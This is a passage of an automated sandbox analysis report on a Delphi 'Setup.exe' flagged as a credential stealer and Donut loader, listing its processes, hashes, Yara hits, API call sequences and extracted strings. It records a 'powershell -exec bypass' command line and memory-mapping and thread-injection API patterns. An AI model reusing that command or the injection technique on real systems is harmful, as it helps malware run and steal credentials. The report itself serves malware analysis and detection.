Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x850000
File size:	76'122'589 bytes
MD5 hash:	79C238EBE5C951B14E9E4729CE73FCC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1905498616.0000000001066000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:12:35
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass error code: 523
Imagebase:	0x720000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:12:35
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	31.6%
Total number of Nodes:	117
Total number of Limit Nodes:	10

Executed Functions

Function 00F9B3DF Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00F9B478
NtMapViewOfSection.NTDLL(?,00000000), ref: 00F9B520
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00F9B894
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00F9B949
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00F9B966
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00F9BA09
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00F9BA3C
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00F9BBAD

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: 0dde0cdbfa95be85e684733f924746c760c786c5342039d18f021c44627a35bf
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: CA42AB72A08301AFEB24CF24DD84B6BB7E8EF88714F14492DF9859B251D770E940DB92

Function 00F5041F Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00F506C2
TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00F509B6

Strings

^, xrefs: 00F50495
esGo, xrefs: 00F50547
y_q, xrefs: 00F504BD

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID: CreateProcessTerminateThread
String ID: ^$esGo$y_q
API String ID: 1197810419-1552005304
Opcode ID: 990791149b283cd096f1c3f16cf0b8debaab34caef6c0c011a5c64a9ab0219a9
Instruction ID: 0407c42b9223dd8117cf8583d25dd38a753e2a13f32fc40dc71de31f0c8f540a
Opcode Fuzzy Hash: 990791149b283cd096f1c3f16cf0b8debaab34caef6c0c011a5c64a9ab0219a9
Instruction Fuzzy Hash: 5B12F3B1E00209DFDB14CF98C991BADBBB2FF88305F2482A9D905AB385C7346A45DF54

Function 00F50B2F Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00F50675,?,00000001,?,81EC8B55,000000FF), ref: 00F50B6D
Thread32First.KERNEL32(00000000,0000001C), ref: 00F50B99
Wow64SuspendThread.KERNEL32(00000000), ref: 00F50BEC
CloseHandle.KERNEL32(00000000), ref: 00F50C16

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 9f88c71b0b5e30e01dfb4efb5fb28d720a77f950818f7063b6a91de4bc97f42f
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 15410D71A00108AFDB18DF98C494FADB7F6EF89310F50C168EA159B7A4DB34AE45CB94

Function 00F509DF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00F50AAB

Strings

,, xrefs: 00F50AF7

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 066fd50c6a7d00ad24adcc950c499446aec38c7395aedf300a680d6ac0c911d0
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 1A41C474E00209EFDB04CF98C994BAEB7B1BF88315F208198D915AB381C775AE85DF94

Function 00F9C05D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 00F9C0EF

Strings

.dll, xrefs: 00F9C094

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: bedc20289fc1f635998a854d9d1d385916ea68b01aebc92666e6a4bab7b1a465
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: 8D21E476A04295CFFF22CFADC844A697BA4AF01360F18416DD806DBA51D730EC46DBC0

Function 00F9ACAF Relevance: 2.8, APIs: 2, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F9AD29
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 00F9B06D

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: dea4f340a3b8c9ea57b379953a0d14966e4116164583b3f5f6cacf399ae5edd4
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: 95B1E572900A02ABEF32AF60DD80BA7F7E8FF45324F100919F55996151E735E950EBD2

Non-executed Functions

Function 00F6323C Relevance: 127.0, Strings: 100, Instructions: 2022COMMON

Download Yara Rule

Strings

w, xrefs: 00F63958
3, xrefs: 00F64E29
F, xrefs: 00F64781
&, xrefs: 00F64681
x, xrefs: 00F645B8
X, xrefs: 00F641C3
k, xrefs: 00F64729
D, xrefs: 00F64771
~, xrefs: 00F647C1
_, xrefs: 00F63ACB
@, xrefs: 00F64751
^, xrefs: 00F646C1
1, xrefs: 00F63980
@, xrefs: 00F64A47
z, xrefs: 00F645C2
{, xrefs: 00F63978
N, xrefs: 00F64741
, xrefs: 00F64651
D, xrefs: 00F64A37
|, xrefs: 00F647B1
r, xrefs: 00F647E1
>, xrefs: 00F63AC1
6, xrefs: 00F646E9
p, xrefs: 00F64A77
L, xrefs: 00F64E49
f, xrefs: 00F63F25
/, xrefs: 00F64739
c, xrefs: 00F6329E
O, xrefs: 00F64E31
&, xrefs: 00F647A9
^, xrefs: 00F63AC6
H, xrefs: 00F64711
a, xrefs: 00F639A8
c, xrefs: 00F63F15
E, xrefs: 00F64A67
<, xrefs: 00F64699
M, xrefs: 00F64E41
V, xrefs: 00F64701
u, xrefs: 00F63D56
\, xrefs: 00F64A97
X, xrefs: 00F64691
\, xrefs: 00F646B1
C, xrefs: 00F6334E
., xrefs: 00F64641
B, xrefs: 00F63498
s, xrefs: 00F647E9
", xrefs: 00F64661
e, xrefs: 00F645B3
B, xrefs: 00F64761
c, xrefs: 00F639B8
T, xrefs: 00F646F1
L, xrefs: 00F64731
2, xrefs: 00F64709
_, xrefs: 00F647C9
Q, xrefs: 00F6349D
x, xrefs: 00F64791
P, xrefs: 00F646D1
*, xrefs: 00F64719
D, xrefs: 00F650BC
}, xrefs: 00F63988
K, xrefs: 00F64A87
B, xrefs: 00F64AB7
-, xrefs: 00F63547
C, xrefs: 00F641BE
S, xrefs: 00F647D9
x, xrefs: 00F63C23
w, xrefs: 00F643BC
e, xrefs: 00F639C8
R, xrefs: 00F646E1
Z, xrefs: 00F646A1
n, xrefs: 00F6377D
f, xrefs: 00F63447
D, xrefs: 00F650C9
g, xrefs: 00F64A27
f, xrefs: 00F63C19
?, xrefs: 00F63970
t, xrefs: 00F647F1
`, xrefs: 00F63FF0
g, xrefs: 00F63C1E
J, xrefs: 00F64721
L, xrefs: 00F64AA7
y, xrefs: 00F645BD
D, xrefs: 00F64BD4
N, xrefs: 00F64E39
z, xrefs: 00F647A1
$, xrefs: 00F64671
H, xrefs: 00F64A17
v, xrefs: 00F63D46
l, xrefs: 00F64E11
d, xrefs: 00F639C0
,, xrefs: 00F64631
Y, xrefs: 00F64799
u, xrefs: 00F643AC
a, xrefs: 00F63C14
y, xrefs: 00F63968
#, xrefs: 00F64238
", xrefs: 00F64769
p, xrefs: 00F647D1
R, xrefs: 00F63353
D, xrefs: 00F64659

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $"$"$#$$$&$&$*$,$-$.$/$1$2$3$6$<$>$?$@$@$B$B$B$C$C$D$D$D$D$D$D$E$F$H$H$J$K$L$L$L$M$N$N$O$P$Q$R$R$S$T$V$X$X$Y$Z$\$\$^$^$_$_$`$a$a$c$c$c$d$e$e$f$f$f$g$g$k$l$n$p$p$r$s$t$u$u$v$w$w$x$x$x$y$y$z$z${$|$}$~
API String ID: 0-2021677360
Opcode ID: e272b450acce53a6e6af77a1dca5bdd969495b0a5ef3ed9536c73b2781ae1e47
Instruction ID: a9ad3c2e2269c302eef46caf11f411d997e57044b3650d899767d9aa07c5f82b
Opcode Fuzzy Hash: e272b450acce53a6e6af77a1dca5bdd969495b0a5ef3ed9536c73b2781ae1e47
Instruction Fuzzy Hash: C4139E3160C7C18AD335DB38C84439EBBE2ABD6324F188A6DE4E9873D2D77985459B13

Function 00F864E3 Relevance: 44.1, Strings: 35, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e, xrefs: 00F86589
<, xrefs: 00F866C1
#, xrefs: 00F8650B
0, xrefs: 00F86808
y, xrefs: 00F865F1
J, xrefs: 00F865F9
}, xrefs: 00F865D1
9, xrefs: 00F86713
S, xrefs: 00F86535
~, xrefs: 00F865C1
a, xrefs: 00F86551
X, xrefs: 00F8655F
G, xrefs: 00F865B9
h, xrefs: 00F8657B
N, xrefs: 00F86601
., xrefs: 00F866F3
I, xrefs: 00F86599
3, xrefs: 00F866FB
q, xrefs: 00F865A1
=, xrefs: 00F86703
, xrefs: 00F864FD
H, xrefs: 00F865B1
>, xrefs: 00F8671B
z, xrefs: 00F86611
D, xrefs: 00F865E9
y, xrefs: 00F86609
], xrefs: 00F86543
E, xrefs: 00F865D9
h, xrefs: 00F86822
B, xrefs: 00F865E1
2, xrefs: 00F864EF
i, xrefs: 00F86826
<, xrefs: 00F8670B
>, xrefs: 00F866CA
l, xrefs: 00F8656D

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $#$.$0$2$3$9$<$<$=$>$>$B$D$E$G$H$I$J$N$S$X$]$a$e$h$h$i$l$q$y$y$z$}$~
API String ID: 0-394809611
Opcode ID: 0d6d08487e955f9177916864f44ca78d6bbd7e72dd8cc35d350150198613bc5e
Instruction ID: 9443779a17cc201b2930ad2f332994363fa1be8c3ef211a7c77833e9deb4247a
Opcode Fuzzy Hash: 0d6d08487e955f9177916864f44ca78d6bbd7e72dd8cc35d350150198613bc5e
Instruction Fuzzy Hash: 81E1D321D087E98EDB32C67C88043DDBFB15B22324F1843D9D4E9AB3D2C6754A46DB66

Function 00F74F8C Relevance: 29.2, Strings: 23, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

m^kP, xrefs: 00F75A54
q4g6, xrefs: 00F753FC
IzJ|, xrefs: 00F75AA1
#$, xrefs: 00F75428
rBtD, xrefs: 00F75A33
IM, xrefs: 00F75000
k<l>, xrefs: 00F753E6
]\, xrefs: 00F757ED
o.] , xrefs: 00F75892
dVfh, xrefs: 00F75A6A
`"U$, xrefs: 00F7589D
`R`T, xrefs: 00F75A5F
},z., xrefs: 00F75412
HJ, xrefs: 00F7524F
M~Kp, xrefs: 00F75AAC
-G, xrefs: 00F74FEA
WU, xrefs: 00F74FF5
o0e2, xrefs: 00F753F1
X[, xrefs: 00F757E2
=>, xrefs: 00F758BE
E@, xrefs: 00F7500B
tv, xrefs: 00F75362
S&P8, xrefs: 00F758A8

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: #$$-G$=>$E@$IzJ|$IM$M~Kp$S&P8$WU$X[$]\$`"U$$`R`T$dVfh$k<l>$m^kP$o.] $o0e2$q4g6$rBtD$tv$},z.$HJ
API String ID: 0-3675480717
Opcode ID: 83e6b264bc1b687bb486f152c1103bd08daf09dee42d9de2b9037db0f02a905c
Instruction ID: fb3de69a70034be87002c3990e641ce57fba025860df3de6d632c293735baa5e
Opcode Fuzzy Hash: 83e6b264bc1b687bb486f152c1103bd08daf09dee42d9de2b9037db0f02a905c
Instruction Fuzzy Hash: 92421BB160C7958AD330CF55D80278FBAF2FBC2304F40891DC5E96B216DBB5864A9B97

Function 00F61C96 Relevance: 20.8, Strings: 16, Instructions: 772
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

y, xrefs: 00F6225E
<, xrefs: 00F62482
J, xrefs: 00F61D4E
K, xrefs: 00F6258A
E, xrefs: 00F6246A
4, xrefs: 00F61FEC
Y, xrefs: 00F6247A
T, xrefs: 00F61E27
n, xrefs: 00F621D9
3, xrefs: 00F61FE4
^, xrefs: 00F62472
E, xrefs: 00F6257A
', xrefs: 00F62414
", xrefs: 00F6224E
3, xrefs: 00F61E2C
r, xrefs: 00F62582

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "$'$3$3$4$<$E$E$J$K$T$Y$^$n$r$y
API String ID: 0-2456329422
Opcode ID: 99042b384dec40b98c5d0a1ab103d5428fa5e031e8d578adf07787c5a93c25e9
Instruction ID: ed89c2320936d304a53505bd86339a0bdbea4c3ead778c21ee04d32647c51988
Opcode Fuzzy Hash: 99042b384dec40b98c5d0a1ab103d5428fa5e031e8d578adf07787c5a93c25e9
Instruction Fuzzy Hash: 0162E832A0C7808BC764DF38C4953AEBBE1AF95314F19892ED8DD97381D6788945EB43

Function 00F79BE9 Relevance: 14.2, Strings: 11, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y6KH, xrefs: 00F79F3B
,J=L, xrefs: 00F79F43
%B!D, xrefs: 00F79F53
EF, xrefs: 00F79F5B
E*w,, xrefs: 00F79CAC
@"_$, xrefs: 00F79F13
V2V4, xrefs: 00F79F33
(N3@, xrefs: 00F79F4B
M:D<, xrefs: 00F79F23
O>^0, xrefs: 00F79F2B
R.L , xrefs: 00F79F0B

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: %B!D$(N3@$,J=L$@"_$$E*w,$EF$M:D<$O>^0$R.L $V2V4$Y6KH
API String ID: 0-989434418
Opcode ID: 6078bc0ade777d34a2ddf8fa3371973c5e06abd464537b3327961385a84a3245
Instruction ID: 2c972b18dcd846158986c4c936b385ace9ffadab3d45b63a341f9d82f480e0d0
Opcode Fuzzy Hash: 6078bc0ade777d34a2ddf8fa3371973c5e06abd464537b3327961385a84a3245
Instruction Fuzzy Hash: E1D1CB7160C3108BC714DF68C89126BB7F2EFE6320F15991DE8D94B3A0E2B99906D757

Function 00F5CFFA Relevance: 13.9, Strings: 11, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{$R&, xrefs: 00F5D26F
sT+V, xrefs: 00F5D28B
|+~, xrefs: 00F5D2B5
V(v*, xrefs: 00F5D25A
ep, xrefs: 00F5D3E3
2lMn, xrefs: 00F5D2D1
!h=j, xrefs: 00F5D2CA
~,s., xrefs: 00F5D261
0xz, xrefs: 00F5D2AE
#HiJ, xrefs: 00F5D292
+p:r, xrefs: 00F5D2BC

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !h=j$#HiJ$+p:r$0xz$2lMn$V(v*$ep$sT+V${$R&$~,s.$|+~
API String ID: 0-1833152483
Opcode ID: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
Instruction ID: 729c01ffbf6d9288fa590fcffa5933af648c7e03c40a1c47945f6f9747c2210c
Opcode Fuzzy Hash: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
Instruction Fuzzy Hash: 36B1FDB08153408FE354DF168A89FA67FB1FB41610F1A82E8D6892F376C7359046CF99

Function 00F7270C Relevance: 11.9, Strings: 9, Instructions: 601COMMON

Download Yara Rule

Strings

D, xrefs: 00F72940
@, xrefs: 00F72BC7
C, xrefs: 00F72BD6
,, xrefs: 00F72D25
C, xrefs: 00F72BD1
H, xrefs: 00F72BCC
E, xrefs: 00F72945
!@, xrefs: 00F72742
F, xrefs: 00F7294A

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$@$C$C$D$E$F$H
API String ID: 0-167259457
Opcode ID: a8658c88cceae026a964532195ae745317ee3b30719fda5ab8108997b40a3c2b
Instruction ID: d7450f6dad638a4b8ff9a72b475881cd69b6437c226801112476b6b07b558e19
Opcode Fuzzy Hash: a8658c88cceae026a964532195ae745317ee3b30719fda5ab8108997b40a3c2b
Instruction Fuzzy Hash: 7532C03260C7808FD368DF28C85136EBBE2ABD5320F198A2EE5D9873D1D77988459753

Function 00F68033 Relevance: 11.4, Strings: 9, Instructions: 145COMMON

Download Yara Rule

Strings

|8~, xrefs: 00F680D1
j f", xrefs: 00F68058
G,_., xrefs: 00F681E0
.H7J, xrefs: 00F6809A
Z$V&, xrefs: 00F68063
<@>B, xrefs: 00F680B0
0x8z, xrefs: 00F680C6
SX+Z, xrefs: 00F6806E
2\1^, xrefs: 00F68079

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: |8~$.H7J$0x8z$2\1^$<@>B$G,_.$SX+Z$Z$V&$j f"
API String ID: 0-2903174340
Opcode ID: 7cd789ec04f0b600f9527db159a9b866ca89a4aae64b4c1697764611260c43aa
Instruction ID: 5ef2083fd4f61f775f5b27e9464e1e528c13a9a5f91013d46a1427319be8b436
Opcode Fuzzy Hash: 7cd789ec04f0b600f9527db159a9b866ca89a4aae64b4c1697764611260c43aa
Instruction Fuzzy Hash: 755133B48093948BD7789F11C9A23EABBF0FF86300F94492DD5C85B204DB755146DB87

Function 00F8735C Relevance: 10.7, Strings: 8, Instructions: 698COMMON

Download Yara Rule

Strings

~=w?, xrefs: 00F877B0
z)e+, xrefs: 00F87788
a-N/, xrefs: 00F87790
J9e;, xrefs: 00F877A8
3<, xrefs: 00F8766C
lefg, xrefs: 00F8738C
D%`', xrefs: 00F87780
@!H#, xrefs: 00F87778

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 3<$@!H#$D%`'$J9e;$a-N/$lefg$z)e+$~=w?
API String ID: 0-614847132
Opcode ID: 4b53e16dd2b0918ff17c13154fc3fe6e4b8616ef8dc66ed430685e591bcd14af
Instruction ID: 32cdaf084fe3cf30b6039ca07b762a0d9c60d17511fe1459729b1c7f43e97c14
Opcode Fuzzy Hash: 4b53e16dd2b0918ff17c13154fc3fe6e4b8616ef8dc66ed430685e591bcd14af
Instruction Fuzzy Hash: 9722F3726083009FD314EF24CC8579BFBE6EBC5324F28892DE995872A1D779D805CB92

Function 00F6F87C Relevance: 9.6, Strings: 7, Instructions: 853COMMON

Download Yara Rule

Strings

wYY[, xrefs: 00F6FED7
A, xrefs: 00F6FA6E
$%)., xrefs: 00F6FB7C
IVW, xrefs: 00F6FAFC
c~z5, xrefs: 00F6FA3D
LEKG, xrefs: 00F6FECF
'{9", xrefs: 00F6FEE6

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: IVW$$%).$'{9"$A$LEKG$c~z5$wYY[
API String ID: 0-3406648604
Opcode ID: 7e02dff93018fb179fc1768eaaae457e716f1b753da8a7136ab0a030ac5e8075
Instruction ID: 4e084a08786f6c2839223fd6e92cfa00c649eeba4fd1e407be53789a7abb6f97
Opcode Fuzzy Hash: 7e02dff93018fb179fc1768eaaae457e716f1b753da8a7136ab0a030ac5e8075
Instruction Fuzzy Hash: 8A52377190C3818FD725CF24D85076EBBE1AF96324F08867DE8D88B392D775890ADB52

Function 00F85271 Relevance: 8.9, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

-, xrefs: 00F853A6
x, xrefs: 00F852A5
o, xrefs: 00F85285
4, xrefs: 00F85384
|, xrefs: 00F85295
}, xrefs: 00F8529D
b, xrefs: 00F8528D

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: -$4$b$o$x$|$}
API String ID: 0-3023783532
Opcode ID: c85f46a286bb54b62802cd9c50375cf097368bef13a6d6b31a6d92675efce217
Instruction ID: ecb2b703404927aecf23ca50c9cddf5d4c58d40bd8f0357266cc9a15fadb1cf3
Opcode Fuzzy Hash: c85f46a286bb54b62802cd9c50375cf097368bef13a6d6b31a6d92675efce217
Instruction Fuzzy Hash: 4581F631D086998FCB21CB78C8503DDBBB1AB56324F1802D9D4A9AB3D1D7744A86CB52

Function 00F627C4 Relevance: 8.0, Strings: 6, Instructions: 547COMMON

Download Yara Rule

Strings

g, xrefs: 00F627D7
?, xrefs: 00F629C5
}, xrefs: 00F62DB4
e, xrefs: 00F62B0F
", xrefs: 00F62B9C
8, xrefs: 00F62BA1

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "$8$?$e$g$}
API String ID: 0-893667707
Opcode ID: 72d96fd66839b40274155523ea4ae3a2a23f9b7d25032f6dc036cb9148fad6f5
Instruction ID: 2b5bf61debe5f39c93b75d26f818137a94d14b2c2f88be815c7239fa76525307
Opcode Fuzzy Hash: 72d96fd66839b40274155523ea4ae3a2a23f9b7d25032f6dc036cb9148fad6f5
Instruction Fuzzy Hash: 3922FA7260C7908BD764DF38C85539EBBE1AFD4320F198A2EE9E9873D1D6748901A743

Function 00F5C0EC Relevance: 6.7, Strings: 5, Instructions: 428COMMON

Download Yara Rule

Strings

bc, xrefs: 00F5C2A3
P!%M, xrefs: 00F5C2F3
9NO9, xrefs: 00F5C3F8
v, xrefs: 00F5C10D
9NO9, xrefs: 00F5C48C, 00F5C59B, 00F5C4C5, 00F5C4D3, 00F5C566, 00F5C572, 00F5C36C, 00F5C3B1

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 9NO9$9NO9$P!%M$bc$v
API String ID: 0-4228005716
Opcode ID: 5d673c6a1492cac4c16508e0cf3a4cd46a8514f6efee81578b4a9496add7f69d
Instruction ID: b375909a33df1fa5c384807ea6dd2e1a72bcd22976bc0a2075ad77355ea77aad
Opcode Fuzzy Hash: 5d673c6a1492cac4c16508e0cf3a4cd46a8514f6efee81578b4a9496add7f69d
Instruction Fuzzy Hash: 62D1057264C3504FC324DF6888512ABFBE39BD1315F1C896CE9C68B346E675D90ADB82

Function 00F5A8EC Relevance: 6.6, Strings: 5, Instructions: 378COMMON

Download Yara Rule

Strings

DXVY, xrefs: 00F5A9FB
RXTQ, xrefs: 00F5AA03
{b, xrefs: 00F5A94C
LO, xrefs: 00F5AABA
s, xrefs: 00F5AAC1

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: DXVY$LO$RXTQ$s${b
API String ID: 0-3953797783
